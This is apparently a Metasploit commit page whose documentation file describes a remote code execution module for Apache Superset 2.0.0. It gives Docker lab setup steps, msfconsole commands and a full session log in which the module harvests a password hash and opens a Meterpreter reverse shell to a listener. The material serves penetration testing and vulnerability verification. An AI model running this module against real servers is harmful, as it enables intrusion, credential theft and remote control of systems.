superset rce wip

rapid7 · Sep 7, 2023 · b723954 · b723954
1 parent 030fc99
commit b723954
Show file tree

Hide file tree

Showing 2 changed files with 544 additions and 0 deletions.
diff --git a/documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md b/documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+## App Install
+
+```
+sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
+sudo docker exec -it superset superset fab create-admin \
+              --username admin \
+              --firstname Superset \
+              --lastname Admin \
+              --email admin@superset.com \
+              --password admin
+sudo docker exec -it superset superset db upgrade
+sudo docker exec -it superset superset init
+```
+
+Login to the app, click 'list users' under 'Settings', then click '+'. Make a new user with 'Public' as the role.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_superset_cookie_sig_rce`
+1. Do: `set rhost [ip]`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Apache Superset 2.0.0 on Docker
+
+```
+msf6 > use exploit/linux/http/apache_superset_cookie_sig_rce 
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set username admin
+username => admin
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set password admin
+password => admin
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set lhost 192.168.154.74
+lhost => 192.168.154.74
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.154.74:4444 
+[*] Attempting login
+[*] 127.0.0.1:8088 - CSRF Token: IjRjNDFiNzM3MjUwOWMzZWJkY2YwNWM4N2JkOTRhZjJlY2YwOWI3NDUi.ZPoroQ.Jhv-EqwwbX7Un77JmCd-fPRO0jw
+[*] 127.0.0.1:8088 - Attempting login
+[*] Attempting to pull user creds from db
+[*] Grabbing CSRF token
+[+] CSRF Token: IjRjNDFiNzM3MjUwOWMzZWJkY2YwNWM4N2JkOTRhZjJlY2YwOWI3NDUi.ZPoroQ.Jhv-EqwwbX7Un77JmCd-fPRO0jw
+[+] Successfully created db mapping with id: 1
+[*] Creating new sqllab tab
+[+] Using tab: 1
+[*] Setting latest query id
+[*] Harvesting superset user creds
+[+] Superset Creds
+==============
+
+  Username  Password
+  --------  --------
+  admin     pbkdf2:sha256:260000$GDv10qGetjVq8CIX$735ed1e400e2e2ebbdfd294f60f2e2800177874bc2455761cd799e14f7df6cd2
+
+[*] Attempting RCE
+[*] Creating new dashboard
+[+] New Dashboard id: 1
+[*] Grabbing permalink to new dashboard to trigger payload later
+[+] Dashboard permalink key: eybwJ7EVjR3
+[*] Setting latest query id
+[*] Uploading payload
+[*] Triggering payload
+[*] Sending stage (24768 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.154.74:4444 -> 172.17.0.2:53892) at 2023-09-07 15:59:31 -0400
+[*] Deleting dashboard
+[*] Deleting sqllab tab
+[*] Deleting database mapping
+
+meterpreter > getuid
+Server username: superset
+meterpreter > sysinfo
+Computer        : 1e681df9b6fe
+OS              : Linux 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29)
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+```